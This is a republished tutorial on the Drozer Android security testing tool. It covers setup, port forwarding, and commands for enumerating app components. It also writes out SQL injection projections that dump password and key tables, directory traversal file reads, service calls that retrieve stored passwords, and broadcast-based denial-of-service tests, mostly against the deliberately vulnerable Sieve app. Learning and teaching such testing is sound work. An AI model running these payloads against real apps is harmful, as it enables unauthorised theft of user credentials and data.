Mastering Drozer: Step‑by‑Step Android Security Testing Guide
This guide walks through installing Drozer, configuring port forwarding, connecting the console, and using a variety of commands to enumerate packages, activities, content providers, services, and broadcast receivers on Android devices, while also addressing common errors and demonstrating vulnerability scans such as SQL injection and directory traversal.
1. Basic Use of Drozer
Drozer installation: download from https://labs.mwrinfosecurity.com/tools/drozer/ and install the agent.apk on the target Android device or emulator.
Run Drozer: the server listens on port 31415. Forward the port with adb forward tcp:31415 tcp:31415 and connect using drozer console connect.
Common issues: error "adb: error: no devices/emulators found". Solutions include restarting the emulator or device, restarting adb ( adb kill-server && adb start-server), using adb nodaemon server, checking port usage with sudo lsof -i :31415, finding the process with ps -ef | grep *, and terminating it with sudo kill -9 PID.
2. Common Commands
1. Basic Information
a. List all app packages with a keyword: run app.package.list -f sieve Get detailed info for a specific app: run app.package.info -a com.mwr.example.sieve 2. Activity Component
In Android, an Activity represents a screen; components communicate via Intents. View activity details: run app.activity.info -a com.mwr.example.sieve. Start an activity:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.FileSelectActivityand
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList.
Observation: the activity crashes, indicating a low‑risk vulnerability.
3. Content Provider
a. Retrieve attack surface information: run app.provider.info -a com.mwr.example.sieve 3.1 SQL Injection Scan
Run scanner: run scanner.provider.injection -a com.mwr.example.sieve. Query tables:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--". View data in Keys table:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection "* from Passwords;–"and
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --projection "* from Key;–".
3.2 Directory Traversal Scan
Scan a specific package: run scanner.provider.traversal -a com.ziroom.awesome. Read a file: run app.provider.read contentProviderURI+filePath. Download a file:
run app.provider.download contentProviderURI+filePath exportPath.
4. Service Component
a. Get service details: run app.service.info -a com.mwr.example.sieve. Retrieve password via service:
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 0 --extra string com.mwr.example.sieve.PIN 1234 --bundle-as-obj. Invoke CryptoService:
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 3452 0 0 --extra string com.mwr.example.sieve.KEY Woshihuaxiazi123 --extra string com.mwr.example.sieve.STRING 1233 --bundle-as-obj.
5. Broadcast Component
a. List broadcast receivers: run app.broadcast.info -f com.ziroom.awesome. Send a broadcast:
run app.broadcast.send --component com.isi.vul_broadcastreceivercom.isi.vul_broadcastreceiver.MyBroadCastReceiver --extra string number 666666. Test denial‑of‑service by sending an intent with empty action or extras, and test privilege escalation by crafting a full intent.
References
https://blog.csdn.net/lostinai/article/details/48999713
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.